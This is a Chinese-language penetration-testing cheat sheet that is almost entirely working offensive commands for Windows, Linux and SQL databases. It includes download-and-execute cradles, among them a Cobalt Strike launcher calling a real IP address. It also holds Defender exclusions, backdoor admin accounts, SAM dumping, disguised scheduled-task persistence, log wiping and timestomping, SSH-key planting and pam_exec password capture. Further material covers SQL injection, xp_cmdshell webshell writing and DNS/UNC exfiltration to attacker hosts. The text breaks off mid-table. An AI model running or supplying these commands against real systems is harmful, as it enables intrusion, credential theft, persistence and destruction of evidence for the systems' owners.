Windows 命令速查
TCP 出网探测
powershell Test-NetConnection -ComputerName [目标主机名或IP] -Port [端口号]
远程下载文件
certutil
certutil.exe -urlcache -split -f "http://127.0.0.1:8080/file.exe" "C:/Windows/temp/file.exe"
//从 http://127.0.0.1:8080/ 下载 file.exe 并保存到 C:/Windows/temp/file.exe
PowerShell
powershell -Command "Invoke-WebRequest -Uri 'https://www.example.com/file.zip' -OutFile 'C:\Downloads\file.zip'"
BitsAdmin
bitsadmin /transfer "JobName" /download /priority normal https://www.example.com/file.zip C:\path\to\save\file.zip
rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.3.150/chfs/shared/1Z3.exe",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
IIS 网站查询
查看 IIS 绑定的网站:
%windir%\system32\inetsrv\appcmd.exe list sites
查看 Site ID 为 1 的物理路径:
%windir%\system32\inetsrv\appcmd list site /site.id:1 /config | findstr "physicalPath"
IIS 配置文件:
C:\Windows\System32\inetsrv\config\applicationHost.config
%SystemRoot%\System32\inetsrv\config\applicationHost.config
查看 Windows 系统版本:
wmic os get Caption,osarchitecture
修改文件时间
powershell -command "(Get-Item 'C:\path\to\your\file.txt').CreationTime = '2024-01-01 12:00 AM'; (Get-Item 'C:\path\to\your\file.txt').LastWriteTime = '2024-01-02 12:00 AM'"
进程操作
查看端口对应 PID:
netstat -ano | findstr :80
查看 PID 对应程序:
tasklist /FI "PID eq 1234"
根据 PID 查看程序所在目录:
wmic process where ProcessId=1234 get ExecutablePath
执行进程:
start /b xxx.exe
根据名称结束进程:
taskkill /f /t /im GotoHTTP.exe
搜索进程
tasklist | findstr "powershell"
Powershell 无窗口执行 EXE
powershell -executionPolicy bypass Start-Process -WindowStyle hidden -FilePath 'C:/Windows/temp/rd.exe'
net 命令
查看用户列表: net user
powershell查看用户列表: Get-WmiObject -Class Win32_UserAccount
查看用户组列表: net localgroup
查看管理组列表: net localgroup Administrators
添加用户并设置密码: net user test P@ssw0rd /add
将用户加入管理组: net localgroup Administrators test /add
将用户加入桌面组: net localgroup "Remote Desktop Users" guest /add
激活guest用户: net user guest /active:yes
更改guest用户的密码: net user guest P@ssw0rd
将用户加入管理组: net localgroup administrators guest /add
将用户加入桌面组: net localgroup "Remote Desktop Users" guest /add
查看本地密码策略: net accounts
查看当前会话: net session
建立IPC会话: net use \\127.0.0.1\c$ "P@ssw0rd" /user:"domain\Administrator"
netsh 操作防火墙
查看防火墙配置:
netsh firewall show config
Windows Server 2003 及之前的版本,允许指定程序全部连接
netsh firewall add allowedprogram C:\nc.exe "allow nc" enable
Windows Server 2003之后的版本
netsh advfirewall firewall add rule name="pass nc" dir in action=allow program="C:\nc.exe
允许3389放行
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
WIndows Defender 加白排除目录:
C:\Windows\System32\wbem\wmic.exe /Node:localhost /Namespace:\\Root\Microsoft\Windows\Defender Path MSFT_MpPreference call Add ExclusionPath=C:\
powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\test"
文件写入
echo test > C:\test.txt //写入-覆盖
echo test >> c:\test.txt //追加有换行
set /p=test<nul>C:\test.txt //写入
set /p="121d2">>C:\test.txt //不换行追加
//powershell不换行追加
powershell -Command "[System.IO.File]::AppendAllText('C:\windows\temp\111.txt', 'test')"
//规避空格
echo.123>>a.txt
echo,123>>a.txt
type;a.txt
//将base64编码的文件解码写入到 test.jsp
certutil -f -decode base64.txt C:\\test.jsp
//将十六进制文件解码写入到 test.jsp
certutil -decodehex hex.txt C:\\test.jsp
注册表:
Restricted Admin Mode
对应命令行开启 Restricted Admin mode 命令如下:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
查看是否已开启 DisableRestrictedAdmin REG_DWORD 0x0 存在就是开启
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"
查看3389端口
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
https://forum.ywhack.com/coding.php 端口查询
开启远程桌面
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
或者
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
导出 SAM 数据库
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
复制:
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM
使用 https://github.com/3gstudent/NinjaCopy 进行复制。
lsadump::sam /sam:sam.hiv /system:system.hiv
查看盘符剩余空间
## 大小为字节磁盘
::查看C盘
wmic LogicalDisk where "Caption='C:'" get FreeSpace,Size /value
::查看D盘
wmic LogicalDisk where "Caption='D:'" get FreeSpace,Size /value
搜索文件:
#搜索 D 盘下名为 shell.jsp 的文件
cd /d D:\ && dir /b /s shell.jsp
#搜素 D 盘下后缀为 conf 内容且包含 password(不区分大小写):
findstr /s /i /n /d:D:\ "password" *.conf
CS 上线
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://122.114.55.117:8012/download/upload.ps1')
msiexec /q /i http://127.0.0.1:8080/ms10-051.msi
设置文件属性
attrib +s +a +h +r cs.exe // 给文件设置系统文件属性、存档文件属性、隐藏文件属性、只读文件属性
计划任务
schtasks /create /ru system /tn "Microsoft\Windows\Multimedia\SystemMediaService" /sc ONSTART /tr "C:\cs.exe"
// 创建一个名为Microsoft\Windows\Multimedia\SystemMediaService,开机时执行 c:\cs.exe 的计 划任务,需要管理员权限
schtasks /change /tn "Microsoft\Windows\Multimedia\SystemSoundsService" /ru system /tr "C:\cs.exe" /enable
// 修改Microsoft\Windows\Multimedia\SystemSoundsService 计划任务,需要管理员权限, 更改任务无法通过 /sc、/mo 参数更改计划频率
RDP 凭据
#列出所有 RDP 凭证
C:\Users\用户名\AppData\Local\Microsoft\Credentials
dir /a C:\Users\Administrator\AppData\Local\Microsoft\Credentials
Windows 打包目录上传文件
powershell -Command "Compress-Archive -Path E:\update\ -DestinationPath E:\test.zip"
7z.exe a -r -p12345 C:\webs\1.7z C:\webs\
zip -r C:\webs\1.zip C:\webs\
域渗透命令
whoami /user //查看当前用户权限
net config workstation //可知域名和其他信息
net user /domain //查询域用户
net user edgeuser Admin12345 /add /domain //添加域用户
net group "domain admins" edgeuser /add /domain //添加域管理员
net group "enterprise admins" edgeuser /add /domain //添加企业管理员
net group "domain admins" /domain //查询域管理员用户
net group "enterprise admins" /domain //查询域企业管理组
net localgroup administrators /domain //查询域本地管理组
net time /domain //查询域控制器和时间
net view /domain //查询域名称
net view /domain:redteam.local //查询域内计算机
net group "domain computers" /domain //查看当前域内计算机列表
net group "domain controllers" /domain //查看域控机器名
net accounts /domain //查看域密码策略
nltest /domain_trusts //查看域信任
nltest /domain_trusts /all_trusts /v /server:10.10.10.10 //查看某个域的域信任
nslookup -type=SRV _ldap._tcp.corp //通过srv记录查找域控制器
Linux 命令速查
本次不记录命令
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
常用日志清理
echo > /var/log/btmp;echo > /var/log/wtmp;echo > /var/log/lastlog;echo > /var/log/utmp;echo > /var/log/syslog;cat /dev/null > /var/log/secure;cat /dev/null > /var/log/message;echo ok
- /var/log/btmp 记录所有登录失败信息,使用lastb命令查看
- /var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看
- /var/log/wtmp 记录所有用户的登录、注销信息,使用last命令查看
- /var/log/utmp 记录当前已经登录的用户信息,使用w,who,users等命令查看
- /var/log/secure 记录与安全相关的日志信息
- /var/log/message 记录系统启动后的信息和错误日志
Web 日志清理
直接替换日志ip地址:
sed -i 's/127.0.0.1/192.168.1.1/g' access.log
清除部分相关日志:
使用grep -v来把相关信息删除:
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log
把修改过的日志覆盖到原日志文件:
cat tmp.log > /var/log/nginx/access.log
设置终端代理
export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890
查看用户登录记录
last
root 权限创建管理员用户
sudo useradd -m testt && echo "testt:admin@123" | sudo chpasswd && sudo usermod -aG wheel testt
cURL/wget 下载文件
wget -P /tmp/ http://x.x.x.x:8080/shell
curl -o /tmp/xxx http://x.x.x.x:8080/shell
curl/wget 发送文件
curl -X POST --data-binary @file.txt http://localhost:9000
wget --post-file=file.txt http://localhost:9000
curl -T file.txt http://localhost:9000
import socket
def start_server(host, port, buffer_size=1024):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind((host, port))
server_socket.listen(5)
print(f"服务器正在 {host}:{port} 监听...")
while True:
client_socket, addr = server_socket.accept()
print(f"连接来自 {addr}")
# 读取HTTP请求头
request = b""
while b"\r\n\r\n" not in request:
request += client_socket.recv(buffer_size)
headers, file_data = request.split(b"\r\n\r\n", 1)
# 提取文件名(可以根据实际需求修改提取方式)
file_name = "received_file" # 默认文件名
# 保存文件
with open(file_name, 'wb') as f:
f.write(file_data)
while True:
data = client_socket.recv(buffer_size)
if not data:
break
f.write(data)
print(f"文件 {file_name} 已保存")
client_socket.close()
if __name__ == "__main__":
HOST = '0.0.0.0'
PORT = 9000
start_server(HOST, PORT)
文件时间修改
修改 /www/wwwroot/shell.php 时间为 2024.05.16.24
touch -t 202405161200.24 /www/wwwroot/shell.php
查看 DNS 服务器
cat /etc/resolv.conf
停止防火墙
systemctl stop firewalld
service iptables stop
ubuntu:
ufw disable
搜索敏感信息
find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.yaml\|.*\.sh|.*\.jsp|.*\.log|.*\.txt|.*\.xml" | xargs grep -E "=jdbc:|pass=|passwd=|aliyun|password"
echo 写文件
//直接 echo 写入:
echo xxx > /www/xxx.jsp
//base64 写入:
echo eHh4ZGFzMQ== | base64 -d > /www/xxx.jsp
//追加
echo xxx >> /www/xxx.jsp
在线编码:https://forum.ywhack.com/coding.php
写入 ssh 公钥:
echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFEazRVTjhFUTFXOFBWMQ== | base64 -d > authorized_keys
//使用 printf 在末尾处插入,如需换行可添加\n
//参考https://baijiahao.baidu.com/s?id=1727019063436737118&wfr=spider&for=pc
printf "ssh-rsa xxx" >> /root/.ssh/authorized_keys
压缩打包文件
//将 /home/mail /home/web 两个目录打包至 /tmp 目录下命名为web.tar.gz
tar czvf /tmp/web.tar.gz /home/mail /home/web
//zip
zip -r /tmp/web.zip /home/mail /home/web
//可使用 -x 排除,如:
zip -r /tmp/web.zip /home/mail /home/web -x /home/mail/test.txt -x /home/web/log/*
分割上传
split -n 3 fscan //分割为 3 个文件
split -b 500k fscan //以 500 K 大小分割 fscan
Windows 合并:
copy /b xaa+xab fscan
type xaa xab > fscan
Linux 合并:
cat xaa xab > fscan
十六进制获取文件
# 将文件转换为十六进制
xxd -p filename
# 本地还原:
xxd -p -r filename > aa.tar.gz
pam_exec 抓 SSH 密码
需要关闭 SELinux:
setenforce 0 # 关闭
setenforce 1 # 开启
修改 /etc/pam.d/sshd
第一行添加:
auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh
/tmp/sshd.sh:
chmod 777 /tmp/sshd.sh
#!/bin/sh
echo "$(date) $PAM_USER $(cat -) $PAM_RHOST $PAM_RUSER" >> /tmp/123.log
Debian/Ubuntu Docker 安装
Debian 12 / Ubuntu 24.04 安装 Docker 以及 Docker Compose
安装一些必要的软件包
apt update
apt upgrade -y
apt install curl vim wget gnupg dpkg apt-transport-https lsb-release ca-certificates
加入 Docker 的 GPG 公钥和 apt 源
Debian:
curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list
Ubuntu:
curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list
国内机器可以用清华 TUNA 的国内源:
Debian:
curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list
Ubuntu:
curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list
然后更新系统后即可安装 Docker CE 和 Docker Compose 插件
apt update
apt install docker-ce docker-ce-cli containerd.io docker-compose-plugin
安装 Docker Compose
curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-Linux-x86_64 > /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose
JDK 安装
ubuntu18运行
sudo apt install openjdk-11-jre-headless
sudo apt install openjdk-11-jdk
手动
tar -xzvf jdk-13.0.2_linux-x64_bin.tar.gz
cd jdk-13.0.2/
pwd
vim /etc/profile
export JAVA_HOME=/root/jdk-13.0.2
export CLASSPATH=$:CLASSPATH:$JAVA_HOME/lib/ export PATH=$PATH:$JAVA_HOME/bin
source /etc/profile
数据库命令速查
mysql
mysql 查连接 IP
SELECT * FROM performance_schema.hosts;
show full processlist;
mysql 查最大数量表
select table_name,table_rows,table_schema,table_comment from information_schema.tables order by table_rows desc;
查询 user 字段在哪个库哪个表
SELECT
TABLE_SCHEMA AS database_name,
TABLE_NAME AS table_name,
COLUMN_NAME AS column_name
FROM
INFORMATION_SCHEMA.COLUMNS
WHERE
COLUMN_NAME LIKE '%user%';
统计访问过的表次数
//库名,表名,访问次数
select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc;
查看写入权限
mysql> show global variables like '%secure%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | ON |
| secure_file_priv | | 可写入
| secure_file_priv | NULL | 不可写入
+------------------+-------+
SHOW VARIABLES LIKE "secure_file_priv";
- NULL,表示禁止。
- 如果value值有文件夹目录,则表示只允许该目录下文件,测试子目录也不行。
- 如果为空,则表示不限制目录。
不登录执行 sql
mysql -uaHmin -proot test -e "select now()" -N >H:/work/target1.txt
mysql -uroot -e "show databases;" >1.txt
基础命令
显示版本: select version();
显示字符集: select @@character_set_database;
显示数据库: show databases;
显示表名: show tables;
显示字段: show columns from table_name;
显示计算机名: select @@hostname;
系统版本: select @@version_compile_os;
mysql路径: select @@basedir;
数据库路径: select @@datadir;
describe describe table_name;
显示root密码: select User,Password from mysql.user;
导入文件: select load_fie(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);
导出文件: select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;
开启外连: GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
mysql安装路径: show variables;
更新数据库: UPDATE `DX15`.`dx15_common_member` SET `uid` = '1' WHERE `dx15_common_member`.`uid` =40407;更新40407uid变成uid1
mysql更改root密码: mysqladmin -u root password "newpwd";
查询表: select concat(User,0x3a,Password) from mysql.user;
获取数据库所有表: SHOW TABLES FROM `databases`;
获取列前20行: SELECT * FROM `admin_bbs` ORDER BY 1 DESC LIMIT 0,20;
获取表行数: SELECT COUNT(*) AS CNT FROM `dede_admin`;
sql server
相关工具:
xp_cmdshell
SQL Server 2005 之前版本,xp_cmdshell 默认开启:
exec master..xp_cmdshell 'whoami';
判断是否存在 xp_cmdshell 存储过程,返回1表示存在,否则表示不存在:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';
删除 xp_cmdshell:
exec master..sp_dropextendedproc xp_cmdshell;
恢复 xp_cmdshell:
exec master..xp_dropextendedproc xp_cmdshell,@dllname='xplog70.dll' declare @o int;
SQL Server 2005之后的版本中,xp_cmdshell 默认关闭,需要手动开启,开启xp_cmdshell需要sa权限:
# 允许修改高级参数
exec sp_configure 'show advanced options',1;
# 配置生效
RECONFIGURE;
# 开启xp_cmdshell
exec sp_configure 'xp_cmdshell',1;
# 配置生效
RECONFIGURE;
# 检查是否开启
exec sp_configure;
# 执行系统命令
exec master..xp_cmdshell 'whoami';
# 获取webshell
exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\test.aspx'
MSSQL 默认数据库
Name | 描述 |
---|---|
pubs | 在 MSSQL 2005 中不可用 |
model | 在所有版本中可用 |
msdb | 在所有版本中可用 |
tempdb | 在所有版本中可用 |
northwind | 在所有版本中可用 |
information_schema | 从 MSSQL 2000 及更高版本开始可用 |
MSSQL 注释
Type | 描述 |
---|---|
/* MSSQL Comment */ | C-style 注释 |
-- - | SQL 注释 |
;%00 | Null byte |
MSSQL 用户
SELECT CURRENT_USER
SELECT user_name();
SELECT system_user;
SELECT user;
MSSQL 版本查看
SELECT @@version
MSSQL 主机名
SELECT HOST_NAME()
SELECT @@hostname
SELECT @@SERVERNAME
SELECT SERVERPROPERTY('productversion')
SELECT SERVERPROPERTY('productlevel')
SELECT SERVERPROPERTY('edition');
MSSQL 数据库名
SELECT DB_NAME()
MSSQL 数据库凭证
- MSSQL 2000: Hashcat mode 131:
0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578
sql SELECT name, password FROM master..sysxlogins SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
- MSSQL 2005: Hashcat mode 132:
0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe
sql SELECT name, password_hash FROM master.sys.sql_logins SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
MSSQL 列出数据库
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change delimeter value such as ', ' to anything else you want => master, tempdb, model, msdb (Only works in MSSQL 2017+)
MSSQL 列出列
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
SELECT table_catalog, column_name FROM information_schema.columns
MSSQL 列出表
SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
SELECT table_catalog, table_name FROM information_schema.columns
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimeter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
MSSQL 联合注入
-- extract databases names
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb
-- extract tables from Injection database
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users
-- extract columns for the table Users
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName
-- Finally extract the data
$ SELECT UserId, UserName from Users
MSSQL 报错注入
For integer inputs : convert(int,@@version)
For integer inputs : cast((SELECT @@version) as int)
For string inputs : ' + convert(int,@@version) + '
For string inputs : ' + cast((SELECT @@version) as int) + '
MSSQL 盲注
AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
MSSQL 时间注入
ProductID=1;waitfor delay '0:0:10'--
ProductID=1);waitfor delay '0:0:10'--
ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
MSSQL 堆栈查询
- Without any statement terminator
-- multiple SELECT statements SELECT 'A'SELECT 'B'SELECT 'C' -- updating password with a stacked query SELECT id, username, password FROM users WHERE username = 'admin'exec('update[users]set[password]=''a''')-- -- using the stacked query to enable xp_cmdshell -- you won't have the output of the query, redirect it to a file SELECT id, username, password FROM users WHERE username = 'admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
- Use a semi-colon “;” to add another query
sql ProductID=1; DROP members--
MSSQL 读取文件
Permissions: The BULK
option requires the ADMINISTER BULK OPERATIONS
or the ADMINISTER DATABASE BULK OPERATIONS
permission.
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
MSSQL 命令执行
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
重新激活 xp_cmdshell(在 SQL Server 2005 中默认禁用)
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
与 MSSQL 实例交互。
sqsh -S 192.168.1.X -U sa -P superPassword
python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
执行 Python 脚本
由与使用 xp_cmdshell 执行命令的用户不同的用户执行
#Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO
MSSQL 外带数据
MSSQL DNS 外带数据
Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1
# Permissions: Requires VIEW SERVER STATE permission on the server.
1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))
# Permissions: Requires the CONTROL SERVER permission.
1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))
MSSQL UNC 路径
MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the xp_dirtree
function to list the files in our SMB share and grab the NTLMv2 hash.
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
xp_dirtree '\\attackerip\file'
xp_fileexist '\\attackerip\file'
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
RESTORE LABELONLY FROM DISK = '\\attackerip\file'
RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
MSSQL 提升权限为 DB 管理员
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
MSSQL 受信任链接
The links between databases work even across forest trusts.
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio
Manual exploitation
-- find link
select * from master..sysservers
-- execute query through the link
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
select version from openquery("linkedserver", 'select @@version as version');
-- chain multiple openquery
select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
-- execute shell commands
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
-- create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
列出权限
列出当前用户在服务器上的有效权限。
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
列出当前用户在数据库上的有效权限。
SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
列出当前用户在视图上的有效权限。
SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name;
检查当前用户是否属于指定的服务器角色。
-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
SELECT is_srvrolemember('sysadmin');
在查询中使用 SP_PASSWORD
以隐藏日志,如:' AND 1=1--sp_password
MSSQL OPSEC
-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
References
注:大部分内容翻译至:https://github.com/swisskyrepo/PayloadsAllTheThings
- MSSQL渗透测试
- Pentest Monkey – mssql-sql-injection-cheat-sheet
- Error Based – SQL Injection
- MSSQL Trusted Links – HackTricks.xyz
- SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! – Antti Rantasaari – June 6th, 2013
- DAFT: Database Audit Framework & Toolkit – NetSPI
- SQL Server UNC Path Injection Cheatsheet – nullbind
- Full MSSQL Injection PWNage – ZeQ3uL && JabAv0C – 28 January 2009
- Microsoft – sys.fn_my_permissions (Transact-SQL)
- Microsoft – IS_SRVROLEMEMBER (Transact-SQL)
- AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice – Marc Olivier Bergeron – Jun 21, 2023
oracle
相关工具:
oracle查最大数量表
select t.table_name,t.tablespace_name,t.owner,t.num_rows from all_tables t ORDER BY NUM_ROWS DESC;
select t.table_name,t.tablespace_name,t.owner,t.num_rows from all_tables t ORDER BY NUM_ROWS DESC;
select t.table_name tableName, f.comments comments
from user_tables t
inner join user_tab_comments f
on t.table_name = f.table_name
查询包含 user 字段在哪个库哪个表
SELECT
owner AS database_name,
table_name,
column_name
FROM
all_tab_columns
WHERE
column_name LIKE '%USER%'
ORDER BY
owner, table_name, column_name;
Oracle SQL 默认数据库
Name | Description |
---|---|
SYSTEM | 适用于所有版本 |
SYSAUX | 适用于所有版本 |
Oracle SQL 注释
Type | Description |
---|---|
-- - | SQL comment |
Oracle SQL 版本
SELECT user FROM dual UNION SELECT * FROM v$version
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
Oracle SQL 主机名
SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;
Oracle SQL 数据库名称
SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;
Oracle SQL 数据库凭证
SQL 语句 | 描述 |
---|---|
SELECT username FROM all_users; | 适用于所有版本 |
SELECT name, password from sys.user$; | Privileged, <= 10g |
SELECT name, spare4 from sys.user$; | Privileged, <= 11g |
Oracle SQL 列出数据库
SELECT DISTINCT owner FROM all_tables;
Oracle SQL 列出列
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
Oracle SQL 列出表
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
Oracle SQL 报错注入
Description | Query |
---|---|
